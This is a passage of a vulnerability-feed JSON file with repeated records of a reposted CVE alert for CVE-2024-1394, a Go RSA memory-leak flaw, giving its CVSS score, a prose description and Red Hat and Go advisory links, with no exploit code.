"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1563", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "c169876b-e672-47e2-8e3b-1d81368dcef6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4371", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "0f2cb388-3e5d-43d2-96cf-c1beb9447904", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1644", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "49efd408-fa89-4a00-b3f0-0863d39ec1ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4762", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "76f93361-a362-4998-9337-edd988c029c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4699", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "431af219-f40a-4dfb-9ef3-812cbc9c3374", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4960", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "4558e6e0-84c5-4ba6-ae87-263ea83b5fa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1472", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "04eff1a2-724d-4bea-90ee-25ea3789000e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1897", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. 